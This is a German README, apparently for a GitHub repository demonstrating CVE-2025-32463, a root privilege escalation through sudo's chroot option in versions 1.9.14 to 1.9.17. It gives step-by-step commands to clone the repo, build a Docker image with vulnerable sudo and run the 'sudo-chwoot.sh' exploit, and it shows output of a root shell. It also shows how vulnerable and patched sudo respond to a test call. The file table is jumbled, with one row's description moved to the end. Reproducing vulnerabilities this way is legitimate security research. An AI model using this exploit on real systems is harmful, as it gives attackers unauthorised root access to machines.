
Privilegienerweiterung auf root über die sudo-Binärdatei mit der chroot-Option. CVE-2025-32463
Dieses Repository bietet eine minimale, reproduzierbare Umgebung, um die CVE‑2025‑32463-Privilege-Escalation-Schwachstelle in der chroot-Funktion von sudo zu demonstrieren.
Betroffen sind verwundbare Builds von sudo 1.9.14 bis 1.9.17 (alle p‑Revisionen) auf den meisten Linux-Distributionen.
Sicherheitsseiten
| Datei | Zweck |
|---|---|
| Dockerfile | Erstellt ein Ubuntu-24.04-Image mit verwundbarem sudo 1.9.16p2 und Build-Tools |
| sudo‑chwoot.sh | Proof-of-Concept-Exploit, der eine Root-Shell innerhalb des chroot startet |
| run.sh |
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#
run.sh übergibt --privileged und --rm an Docker, sodass sich der Container beim Beenden selbst aufräumt.
Entferne das Image, wenn du fertig bist:
docker rmi sudo-chwoot
| Hilfsskript, das das Image (falls nötig) erstellt und den Exploit-Container startet |